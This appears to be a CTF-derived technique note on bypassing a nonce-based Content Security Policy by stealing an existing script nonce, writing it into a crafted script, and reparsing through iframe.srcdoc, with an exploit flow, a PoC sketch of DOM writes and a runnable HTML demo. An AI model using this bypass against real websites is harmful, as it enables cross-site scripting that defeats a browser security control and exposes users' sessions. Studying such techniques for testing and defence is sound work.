Note
web
javascript
csp-bypass
nonce
srcdoc
reparse
xss
Inject a meta CSP, read an existing nonce, and reparse through iframe.srcdoc to turn a blocked inline script into an allowed one.
Meta CSP Injection + Nonce Theft + iframe.srcdoc Reparse
A meta-delivered CSP is enforced from the point the parser reaches the tag: scripts that already ran
are not affected retroactively, but everything materialized afterwards is, including documents that
inherit the policy container, such as srcdoc iframes. Reparsing through srcdoc runs the HTML parser,
and therefore the script-src nonce check, again over freshly serialized markup. If you can read an
existing nonce and serialize it into a new script element, the inline script that was blocked on the
first parse is allowed on the second.
Why It Works
- Scripts inserted through fragment parsing (innerHTML, outerHTML, insertAdjacentHTML) are marked "already started" and never execute, nonce or not, so a DOM write alone cannot run code.
- An about:srcdoc document inherits the embedder's origin and CSP list and performs a full parse; a script element created by that parse is evaluated normally, and a valid stolen nonce in its nonce attribute passes the check.
- Because the srcdoc document is same-origin with the embedder, the script that runs there has full access to the parent DOM.
Vulnerable Pattern
- A DOM write primitive into the head, the ability to read an existing nonce-bearing script (the .nonce IDL property is enough), and a reparse sink such as iframe.srcdoc.
Exploit Flow
- Gain a generic DOM write primitive.
- Inject a meta CSP to reshape the active policy for the later steps. Multiple policies are all enforced, so a meta policy can only add restrictions; it cannot relax a header-delivered policy. It only "loosens" anything in the sense of being the sole policy when no header policy exists; otherwise use it to block something that gets in the way.
- Read the current nonce from an existing script element (.nonce) or another reachable DOM property.
- Write that nonce into a crafted script element as a real content attribute (setAttribute or Attr.value), because the .nonce setter only fills the internal slot and is not serialized; then assign the element's outerHTML to iframe.srcdoc.
Variations
- Other routes for the serialization or reparse step: document.write, setHTMLUnsafe, cloned nodes, or innerHTML on a detached document.
Common Blockers
- The nonce property not serializing the same as the HTML attribute: setting .nonce does not create a content attribute, and with a header-delivered CSP the browser blanks the nonce content attribute of connected elements (outerHTML shows nonce=""), while .nonce still returns the value.
- Stronger element-specific CSP controls on the reparse sink or on script sources.
- The meta tag landing too late in the parse to change anything that matters.
PoC Sketch
Path-style writes against a generic DOM setter (read as root.path = value): stash the stolen nonce, set it as the first attribute of a crafted script (children.2), then serialize that script into the srcdoc of a sibling iframe (children.3).
ownerDocument.n=ownerDocument.body.lastElementChild.nonce
children.2.attributes.0.value = <stolen nonce>
children.3.srcdoc=children.2.outerHTML
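The following self-contained page is an added demo, not code from the original note or from the fcsc2026 challenge. It models the browser semantics behind the Exploit Flow and the PoC sketch: it reads the nonce of an existing script through .nonce, shows that an innerHTML-inserted script never runs, shows that .nonce does not serialize while a real content attribute does, and finally reparses both serializations through iframe.srcdoc. The nonce value (d3m0n0nce), the log helper and the policy delivered via meta are assumptions made so the file runs without a server; in the real attack the same reads and writes are performed through the DOM-write primitive, not from a script that already executes.

```html
<!doctype html>
<meta charset="utf-8">
<!-- Constructed demo page. The policy is delivered via <meta> so the file can be
     opened directly; a header-delivered policy behaves the same for the reparse
     but additionally blanks the nonce content attribute of connected elements
     (the .nonce IDL property still returns the value). -->
<meta http-equiv="Content-Security-Policy"
      content="script-src 'nonce-d3m0n0nce'; object-src 'none'">
<pre id="log"></pre>
<script nonce="d3m0n0nce">
  // Declared as a global function so the srcdoc document can call parent.log().
  function log(msg) { document.getElementById('log').textContent += msg + '\n'; }

  // Step 1: read the nonce of an existing script through the IDL property.
  // (Assumption: the demo reads its own nonce; the attack reads another script's.)
  const stolen = document.currentScript.nonce;
  log('stolen nonce: ' + stolen);

  // Step 2a (why a plain DOM write is not enough): fragment parsing via innerHTML
  // marks the script "already started", so it never executes, nonce or not, and
  // no securitypolicyviolation fires because execution is never attempted.
  const holder = document.createElement('div');
  holder.innerHTML = '<script nonce="' + stolen + '">parent.log("innerHTML ran")<\/script>';
  document.body.append(holder);

  // Step 2b: build the payload element. The .nonce setter only fills the internal
  // [[CryptographicNonce]] slot, which outerHTML does not serialize; the content
  // attribute must be set for the nonce to survive serialization.
  const payload = document.createElement('script');
  payload.textContent = 'parent.log("srcdoc reparse ran, origin " + location.origin)';
  payload.nonce = stolen;
  const idlOnly = payload.outerHTML;      // <script>...</script>, no nonce attribute
  payload.setAttribute('nonce', stolen);
  const withAttr = payload.outerHTML;     // <script nonce="d3m0n0nce">...</script>
  log('serialized via .nonce:       ' + idlOnly);
  log('serialized via setAttribute: ' + withAttr);

  // Step 3: reparse. An about:srcdoc document inherits the embedder's origin and
  // CSP list, runs a full HTML parse and evaluates the nonce attribute on the new
  // script element. The first frame is blocked (CSP error in the devtools console);
  // the second runs and writes into this document through parent.log().
  for (const html of [idlOnly, withAttr]) {
    const frame = document.createElement('iframe');
    frame.srcdoc = html;
    document.body.append(frame);
  }
</script>
```

Serve the file over HTTP (for example with python3 -m http.server) rather than from file:// so location.origin in the log line is meaningful. To reproduce the header-delivered case, remove the meta tag and send the same policy as a Content-Security-Policy response header; document.currentScript.getAttribute('nonce') then returns an empty string while .nonce still returns d3m0n0nce, which is exactly the serialization mismatch listed under Common Blockers.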
Good Situations To Use It
- You have a DOM-write primitive but CSP blocks inline scripts.
- A nonce-bearing script exists in the DOM.
- A reparse sink (srcdoc) is reachable.
Sources
fcsc2026/web/shrimp_saver_revenge